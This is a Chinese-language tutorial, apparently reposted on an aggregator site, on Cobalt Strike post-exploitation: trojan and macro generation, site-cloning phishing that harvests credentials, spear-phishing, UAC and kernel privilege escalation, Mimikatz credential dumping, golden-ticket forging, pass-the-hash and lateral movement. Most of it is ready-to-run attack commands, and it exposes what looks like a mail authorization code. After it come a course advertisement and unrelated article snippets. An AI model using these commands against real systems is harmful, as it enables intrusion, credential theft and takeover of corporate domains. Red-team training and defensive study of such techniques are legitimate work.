CobaltStrike后渗透进阶篇

0x01 网络钓鱼攻击

钓鱼攻击简介

钓鱼攻击主要通过生成的木马诱使受害者运行后上线,其中木马一般都伪装成正常的程序。与此同时配合钓鱼网站可帮助攻击者模拟真实网站诱骗受害者访问,达到获取账号密码、上线木马等目的。接下来主要介绍后门程序的生成及钓鱼模块的使用,共包括以下几个层面

  • 克隆网站键盘记录

  • 克隆网站执行木马

  • MSF配合CS钓鱼

后门程序生成

首先生成监听器

EXE后门生成

点击攻击生成 exe 后门

选择监听器后点击生成

运行 EXE 木马后上线CS

HTA后门生成

点击攻击生成 HTA 文档

选择监听器后点击生成 HTA 文档

当然也可以把方法切换为 powershell

访问evil.hta成功上线CS

宏病毒生成

点击攻击生成生成 Office 宏病毒

选择监听器后点击生成

程序提示创建宏步骤

在受害主机中打开 Word,创建文档sex.docx,点击查看宏并设置宏的位置

点击创建后把宏代码复制其中

成功保存文档sec.docm

打开文档后点击启用内容

成功上线CS

WEB网络钓鱼

站点管理模块

在站点管理模块中能够看到对应模块,选择 URI 能够复制执行命令

信息收集模块

点击信息收集模块

设置本地端口和跳转URL

访问http://192.168.0.110:8080/会马上跳转到百度,在 web 日志中存在目标系统信息

而应用程序中也会存有记录

克隆网站键盘记录

点击攻击选择网站克隆模块克隆网站

设置克隆URL、本地端口,完成后点击克隆

受害者访问http://192.168.0.110:8081/输入账号密码

在 web 日志中可以看到输入的账号密码

克隆网站执行木马

点击攻击选择文件托管模块

上传生成的 hta 文件,设置本地URI为/update.hta,因此文件地址为http://192.168.0.110:80/update.hta

同样克隆网站设置克隆URL和本地URI,区别是需设置攻击为刚刚设置的文件

在本地访问http://192.168.0.110:80/baidu

点击运行后成功上线CS

MSF配合CS钓鱼

在 MSF 中生成存在溢出代码的站点

msf > use exploit/windows/browser/ms14_064_ole_code_execution
msf > set srvhost 192.168.0.110
msf > set SRVPORT 888
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost 192.168.0.110
msf > exploit

生成URL为http://192.168.0.110:888/YzEvqWqpx7YWgqv

把 URL 复制到克隆网站的攻击地址当中,受害者访问站点就会加载以上 payload 进行溢出攻击

该漏洞存在受限,主要针对 Windows XP 系统,在 XP 中访问http://192.168.0.110:80/msf,需要注意的是访问第一次可能会报错

成功访问 URL 定位到百度站点

成功返回会话

鱼叉钓鱼攻击

鱼叉式网络钓鱼是一种只针对特定目标进行攻击的网络钓鱼攻击。由于鱼叉式网络钓鱼锁定的对象并非是一般个人,而是特定公司或组织的成员,因此与一般网络钓鱼有所不同,它获取的不只是个人信息,还有其他高度敏感的资料,如知识产权、商业机密等。

钓鱼邮件设置

在 CS 中提供了邮箱钓鱼模块,在测试时需要准备以下三种东西:

  • 目标邮箱:xxx@qq.com

  • 发送邮箱:macxxx@163.com 授权密码:WZjkklfsfsac

  • 模板文件:任意

打开邮件钓鱼模块

把目标targets.txt导入目标

打开邮箱并选择一封邮件

点击显示邮件原文,复制内容为template.txt

template.txt导入模版

把跳转界面设置为https://account.aliyun.com/,用于登录阿里云

设置邮件服务器、邮箱的账号密码,其中密码为授权码

设置退信通知邮箱后点击Send发送

接收钓鱼邮件

查看 QQ 邮箱发现邮件已经收到

但是这里遇到一个问题:点击跳转还是原来文件的URL,需要修改原文件,定位点击链接为https://go.circleci.com/NDg1LVpNSC02MjYAAAGBN2O4SHEHs-trqwvcOLAF75ef-iF2QtyVulUAmflDERbarobc_r4Jp-UtmB8Y1HZEU_fU0to=

同时在模版中将其修改为https://account.aliyun.com/即可

成功跳转至阿里云登录页面

结合克隆网站

在 CS 中克隆阿里云登录界面,但提示无法克隆

修改其他网站地址进行克隆

访问http://192.168.0.110:80/并输入账号密码成功返回,说明测试成功

接下来把阿里云登录地址修改为当前克隆网站的地址

再次设置邮箱地址以及账号密码,点击发送后收到邮件

在邮件中点击click me

跳转到目标站点并输入账号密码

记录账号密码成功

0x02 主机权限提升

在 CS 中存在多种提升权限的方式,包括 UAC 提权、MS14-058 提权、PowerUp 提权、Mimikatz 提权等,接下里就来介绍这几种提权方式

UAC绕过提权

UAC 是微软在 Windows Vista 以后版本中引入的一种安全机制,通过 UAC 应用程序和任务能始终在非管理员权限账户下运行,除非管理员特别授予管理员级别的系统访问权限,同时 UAC 可以阻止未经授权的应用程序自动安装并防止无意中更改系统设置。目前 macadmin 为管理员用户,但是后面没有*号,说明没有绕过 UAC 机制

查看当前上线主机用户的所属组,同时 UAC 等级为 Medium

shell whoami /groups

选择凭据提权》权限提升

选择监听器和提权方式为uac-token-duplication,点击运行

成功 BypassUAC 上线macadmin的完全控制权限

新建 SMB 监听器,同样可把它作为监听器完成权限提升

成功上线 CS

MS14-058提权

MS14-058 是微软存在的一个内核提权漏洞,影响范围包括 Windows7 和 Windows Server 2008 R2 及以下版本,攻击者通过该漏洞直接从普通用户提升到系统权限。选择梼杌插件中的权限提升》MS14-058
 


选择监听器后点击运行

成功上线系统权限

PowerUp提权

查询帮助命令存在 powershell 导入命令

help

输入命令导入PowerUp.ps1

powershell-import

运行 powershell 命令进行检查,成功发现系统服务ViewPic_2345Svc

powershell Invoke-AllChecks

查看该服务运行权限,Users用户为 F 权限,说明能完全控制程序

shell icacls "C:\Program Files\2345Soft\2345Pic\protect\Pic_2345Svc.exe"

利用该服务添加系统用户

powershell Install-ServiceBinary -ServiceName ViewPic_2345Svc -UserName machacker -Password 123456

Mimikatz提权

Mimikatz 主要通过抓取用户在内存中的密码,通过密码可登录目标管理员账户,成功提升权限后可抓取明文密码和密码哈希

logonpasswords

即可获取到管理员账号密码

hashdump

利用拿到的明文密码上线管理员

0x03 域内渗透

域内信息收集

枚举信任主机

查看网络内和域内主机和IP地址

net view
net view [domain]

列出当前域控以及特定域控

net dclist 
net dclist [domain]

查看本地和其他主机默认共享

net share
net share \\[computer name] //查看默认共享

查找域和主机名对应的IP地址

shell ping [computer name] #通过ping查看主机名ip地址
shell nslookup [computer name] #根据netbios查看ip地址
shell net view /domain #查找当前域

查看当前域主机列表

shell net view /domain:[domain] 
shell net group "domain computers" //需在域控下执行

64位系统可使用命令查看域信任关系,而在32位下直接使用nltest

shell c:\windows\sysnative\nltest /dclist:[domain] //查看域控
shell c:\windows\sysnative\nltest /domain_trusts //查看域信任关系
shell c:\windows\sysnative\nltest /server:[address] /domain_trusts

导入PowerView.ps1脚本

powershell-import

使用 PowerView 命令枚举主机

powershell Invoke-Netview
powershell Invoke-ShareFinder
powershell Inovke-MapDomainTrusts

判断本地管理员

普通域用户在做一些高级别操作时需要管理员的账号和密码,因此有时候会把普通域用户添加到目标主机的超级管理员组,那么在进行配置时不需要域超级管理员的账号和密码。所以我们要判断当前用户是域用户还是普通用户,进而判断是域管理员还是本地管理员

shell dir \\owa\c$ //查看其他主机的默认共享
powershell Invoke-FindLocalAdminAccess

判断域内管理员

使用 Windows 命令进行判断

shell net group "enterprise admins" /domain
shell net group "domain admins" /domain 
shell net localgroup "administrators" /domain

使用 Beacon 命令进行判断

net group \\[username]
net localgroup \\[username] [group name]

使用 PowerView 命令进行判断

powershell Get-NetLocalGroup -HostName owa

基础信息收集

使用 cmd 命令查看磁盘

shell dir \\[computer name]\c$ //查看主机名对应的C盘目录文件,前提是拥有管理员权限
shell dir /S /B \\[computer name]\c$\users //查看主机下登录过的用户名

使用 powershell 命令查看磁盘

powershell Invoke-Command -ComputerName owa -ScriptBlock{dir c:\}

使用 powershell 运行 mimikatz 获取明文密码

upload invoke-mimkatz.ps1
powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz"

域内登录认证

域管理员Token窃取

查看进程并寻找域控管理员进程 PID

shell whoami
ps

成功找到 httpd 进程为域管理员

窃取该进程获取 token 成功访问域控

steal_token 1400
shell dir \\OWA\C$

清除 token 后就无法访问域控主机

rev2self #还原进程
shell dir \\OWA\C$

在图形化界面中同样能操作

域管凭证制作Token

使用 mimikatz 拿到域管理员的明文密码后可以制作 token

例:make_token domain\user password
make_token GOD\Administrator mac1234!

成功访问域控

shell dir \\OWA\C$

在图形化界面中同样能操作

通过 SMB 协议也可以建立远程连接访问域控

shell net use \\OWA\C$ /user:GOD\Administrator mac1234!
shell dir \\OWA\C$
shell net use * /delete //删除连接
shell net use \\OWA\C$ /del

域管理员哈希传递

使用 mimikatz 收集到的域管理员哈希同样能进行身份认证

例:pth .\administrator [ntlm]
pth GOD\Administrator e97afaff5812d7cc281147091ebb4dc7

成功访问域控

shell dir \\OWA\C$

域管理员票据传递

域内大量使用 Kerberos 认证协议,它和密码散列认证有所不同,两者虽然都使用凭据来产生 Token,但票据存储在 Kerberos 托管的地方。在 Kerberos 认证中 Client 通过 AS(身份认证服务) 认证后, AS 会给 Client 一个 Logon Session Key 和 TGT,而 Logon Session Key 并不会保存在 KDC 中,同时 krbtgt 的 NTLM Hash 又是固定的,所以只要得到 krbtgt 的 NTLM Hash,就可以伪造 TGT 和 Logon Session Key 进入下一步 Client 与 TGS 的交互。如果有了黄金票据后就不需要与 AS 发生交互,可跳过 AS 验证,不用验证账户和密码,也就不用担心域管密码被修改,从而完成权限维持

黄金票据制作条件

  • 域管理员用户名

  • 域名

  • 域SID

  • krbtgt 用户哈希

目前已知域管理员用户名和域名,使用域普通用户获取域 SID

shell whoami/user

其中用户 SID 为S-1-5-21-2952760202-1353902439-2381784089-1113,去掉 1113 后为域 SIDS-1-5-21-2952760202-1353902439-2381784089

使用 mimikatz 获取 krbtgt 用户的哈希值

mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:god.org /all /csv
mimikatz # lsadump::dcsync /domain:god.org /user:krbtgt

成功拿到 krbtgt 用户的哈希值为58e91a5ac358d86513ab224312314061

使用图形化操作界面制作黄金票据

实际执行命令如下:

mimikatz kerberos::golden /user:administrator /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /endin:480 /renewmax:10080 /ptt

查看当前会话凭据

shell klist
shell c:\windows\sysnative\klist

其他 Kerberos 命令如下:

kerberos_ccache_use       #从ccache文件中导入票据应用于此会话
kerberos_ticket_purge     #清除当前会话的票据
kerberos_ticket_use       #从ticket文件中导入票据应用于此会话

域内横向渗透

当前环境下 mac 是 god 域中的普通用户,与此同时还是 test1 主机中的本地管理员。目前 mac 在 stu1 主机上上线,同时 test1 主机上存在域管理员进程

创建服务程序

目前已获得 mac 用户在 stu1 主机上的权限,把木马程序复制到 test1 主机下

shell copy c:\mac.exe \\test1\c$\windows\temp\test1.exe

创建服务执行木马程序并启动服务

shell sc \\test1 create test1 binpath= c:\windows\temp\test1.exe
shell sc \\test1 start test1
shell sc \\test1 delete test1 //删除服务

执行后 test1 主机中的系统用户上线

创建计划任务

首先把木马程序复制到 test1 主机下

shell copy c:\mac.exe \\test1\c$\windows\temp\test1.exe

查看当前主机的时间

shell net time \\test1

设置定时任务执行木马程序

shell at \\test1 1:35:00 c:\windows\temp\test1.exe

成功上线CS

查看本地域管理员进程ID为2040

ps

窃取域管理员的进程 Token

steal_token 2040

成功访问域控

shell dir \\owa\c$

计划任务上线域控

当前域控与 CS 服务端不在同一网段内,需要用到转发监听器,在刚上线主机上选择转发上线

设置转发监听器,实际执行命令如下:

rportfwd 4444 windows/beacon_reverse_tcp

生成木马程序test2.exe并设置转发监听器为zhuanfa

上传木马程序test2.exeC:\Windows\temp\目录下

把木马程序test2.exe复制到域控上

shell copy C:\windows\temp\test2.exe \\owa\c$\windows\temp\test2.exe

查看当前域控时间

shell net time \\owa

设置定时任务执行木马

shell at \\owa 2:07:00 C:\windows\temp\test2.exe

成功上线CS

域内自动化渗透

渗透环境与上面相同

自动化信息收集

上传 PowerView 查看当前环境情况,但结果出现问题

powershell-import
powershell Invoke-FindLocalAdminAccess

当然也可以使用 taowu 插件查询常用信息
 

自动化横向渗透

利用 SMB 协议可无需上传下载代理工具即可完成横向移动,首先创建 SMB 监听

查看当前网段内的主机

net view

选择 test1 主机使用 psexec 进行横向

设置会话和监听,其中 mac 是目标主机的本地管理员

利用 psexec 成功上线 system

查看进程找到域管理员的进程

ps

选择 PID 为2040进行注入

steal_token 2040

在主机中选择 OWA 利用 psexec 进行横向 psexec_psh

设置会话和监听

成功上线域控服务器

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

 1.学习路线图 

 攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。 

 因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。 

 还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

 因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/353808.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

算法 |数字计数

给出n个数字,请你求出在给出的这n个数字当中,最大的数字与次大的数字之差,最大的数字与次小的数字之差,次大的数字与次小的数字之差,次大的数字与最小的数字之差. 易错点 1 1 2 3 4 4 次小不是a[1]了 次大也不是a[n-2]了 #include<bits/stdc.h> using namespace std; …

有了MES、ERP,质量管理为什么还需要QMS?

在制造业&#xff0c;质量管理始终是企业管理中永恒的主题。品质管理要想做得更好&#xff0c;企业必须掌握足够多、足够有用的数据和信息&#xff0c;实现质量管理信息化。很多中小企业也很困惑&#xff0c;是否有必要上线QMS质量管理系统&#xff1f; 一、为什么企业需要QMS的…

LeetCode-2779. 数组的最大美丽值【数组 二分查找 排序 滑动窗口】

LeetCode-2779. 数组的最大美丽值【数组 二分查找 排序 滑动窗口】 题目描述&#xff1a;解题思路一&#xff1a;滑动窗口与排序解题思路二&#xff1a;0解题思路三&#xff1a;0 题目描述&#xff1a; 给你一个下标从 0 开始的整数数组 nums 和一个 非负 整数 k 。 在一步操…

编写C语言程序解决多个数学问题及修正斐波那契数列递归函数

目录 请按下列要求编写程序&#xff1a;(三个函数均在一个C语言源程序) 有一个四位整数&#xff0c;它的9倍恰好是其反序数&#xff08;反序数例&#xff1a;1234与4321互为反序数&#xff09;。 有3个非零十进制数字&#xff0c;用它们可以组合出6个不同的三位数&#xff0…

6.深度卷积神经网络

目录 1.深度卷积神经网络ALexNet 2012AlexNetAlexNet架构AlexNet与LeNet复杂度对比总结代码实现2.使用块的网络VGG 2014 image竞猜第二VGG架构进度总结代码实现3.网络中的网络NiN全连接层的问题NiN块NiN架构总结代码实现4.含并行连结的网络(GoogLeNet)2014 image竞猜第一最好…

数据资产:打破数据孤岛,实现数据互联互通,构建企业智能化转型的重要桥梁。通过高效整合与利用数据资源,推动企业决策的科学化、精准化,助力企业迈向智能化新时代

目录 一、引言 二、数据孤岛现象及其影响 三、打破数据孤岛&#xff0c;实现数据互联互通 1、制定统一的数据标准和管理规范 2、建设统一的数据平台 3、推广数据共享和开放文化 四、数据资产在智能化转型中的重要作用 1、推动企业决策的科学化、精准化 2、优化企业运营…

万界星空科技QMS质量管理介绍

产品的生产质量是企业发展之根本&#xff0c;对所有企业来说&#xff0c;建立完善质量控制体系&#xff0c;对企业生产经营以及发展竞争具有至关重要的影响&#xff0c;可以说是企业质量保证的防火墙。QMS质量管理系统对任何一家企业都具有重要意义&#xff0c;可帮助企业提高生…

汽车传动系统为汽车动力总成重要组成部分 我国市场参与者数量不断增长

汽车传动系统为汽车动力总成重要组成部分 我国市场参与者数量不断增长 汽车系统主要包括动力系统、制动系统、传动系统、转向系统、行驶系统、燃油供给系统、照明系统以及电器系统。汽车传动系统指能够将发动机产生的动力转化为车辆行驶驱动力的动力传递装置。汽车传动系统为汽…

sslyze一键检查服务器检查服务器的 SSL/TLS 安全性(KALI工具系列二十五)

目录 1、KALI LINUX 简介 2、sslyze工具简介 3、信息收集 3.1 目标主机IP&#xff08;服务器&#xff09; 3.2 KALI的IP 4、操作示例 4.1 扫描主机和端口 4.2 批量扫描 4.3 插件扫描 4.4 输出结果 5、总结 1、KALI LINUX 简介 Kali Linux 是一个功能强大、多才多艺…

多分类问题中评价指标F1-Score 加权平均权重的计算方法

多分类问题中评价指标F1-Score 加权平均权重的计算方法 众所周知&#xff0c;F1分数&#xff08;F1-score&#xff09;是分类问题的一个衡量指标。在分类问题中&#xff0c;常常将F1-score作为评价分类结果好坏的指标。它是精确率和召回率的调和平均数&#xff0c;值域为[0,1]。…

从0到1使用vite搭建react项目保姆级教程(持续更新中)

一、vite创建react项目 要使用Vite创建一个React项目&#xff0c;你需要按照以下步骤操作&#xff1a; 1、确保你已经安装了Node.js&#xff08;建议使用最新的稳定版本&#xff09;。 2、 使用npm命令安装Vite CLI工具&#xff0c;再来创建项目 npm create vitelatest my-vi…

# 消息中间件 RocketMQ 高级功能和源码分析(四)

消息中间件 RocketMQ 高级功能和源码分析&#xff08;四&#xff09; 一、 消息中间件 RocketMQ 源码分析&#xff1a;回顾 NameServer 架构设计。 1、RocketMQ 架构设计 消息中间件的设计思路一般是基于主题订阅发布的机制&#xff0c;消息生产者&#xff08;Producer&…

9.华为交换机telnet远程管理配置aaa认证

目的&#xff1a;telnet远程管理设备 LSW1配置 [Huawei]int Vlanif 1 [Huawei-Vlanif1]ip add 1.1.1.1 24 [Huawei-Vlanif1]q [Huawei]user-interface vty 0 4 [Huawei-ui-vty0-4]authentication-mode aaa [Huawei-ui-vty0-4]q [Huawei]aaa [Huawei-aaa]local-user admin pass…

Webmin在EPICS IOC启动中的应用

本文使用webmin启动远程工控机中的EPICS IOC&#xff0c;受控设备使用PI公司的六轴台以及相应的控制器C-887&#xff1a; 1&#xff09;控制器C-887 2) 六轴台&#xff1a; 3&#xff09;在工控机上安装用于与C-887控制器进行通信的EPICS IOC程序&#xff0c;安装结束后&#…

聊一聊生成式AI

生成式AI&#xff08;Generative AI&#xff09;是指一类能够自主创造新内容的人工智能技术&#xff0c;这些内容可以是文本、图像、音频、视频等。与传统的分析性或分类性AI系统不同&#xff0c;生成式模型的主要任务不是对现有数据进行分类或预测&#xff0c;而是生成全新的、…

光电液位传感器在净水器领域的应用优势有哪些?

光电液位传感器作为一种先进的液位检测技术&#xff0c;在净水器领域有着显著的应用优势。具有高精度的特点&#xff0c;能够精确地检测水位变化&#xff0c;保证水处理过程的稳定性和效率。 传统的浮球式传感器可能存在精度偏差或者在长期使用中需要维护和更换的问题&#xf…

内网穿透方法有哪些?路由器端口映射外网和软件方案步骤

公网IP和私有IP不能互相通讯。我们通常在局域网内部署服务器和应用&#xff0c;当需要将本地服务提供到互联网外网连接访问时&#xff0c;由于本地服务器本身并无公网IP&#xff0c;就无法实现。这时候就需要内网穿透技术&#xff0c;即内网映射&#xff0c;内网IP端口映射到外…

从网络配置文件中提取PEAP凭据

我的一位同事最近遇到了这样一种情况&#xff1a;他可以物理访问使用802.1X连接到有线网络的Windows计算机&#xff0c;同时保存了用于身份验证的用户凭据&#xff0c;随后他想提取这些凭据&#xff0c;您可能认为这没什么特别的&#xff0c;但是事情却有点崎岖波折…… 如何开…

屏蔽房是做什么用的?为什么需要定期检测?

屏蔽房对于不了解的人来说&#xff0c;可能光看名字不知道是做什么的&#xff0c;但是对于一些企业或者机构&#xff0c;却是再熟悉不过的了。和名字一样&#xff0c;屏蔽房是对空间内的信号以及一些外界环境条件进行隔绝&#xff0c;在一些有特殊要求的企业机构中&#xff0c;…

人生的乐趣,在于对真知的追求

子曰&#xff1a;朝闻道&#xff0c;夕死可矣&#xff01; 孔子说&#xff1a;早上听到关于世界的真理&#xff0c;哪怕晚上就die了都可以。 这句话很有力量而经常被人引用&#xff0c;表达出我们如何看待沉重的肉身和精神世界。 我们的生活目的&#xff1a;道。 —— 要了解…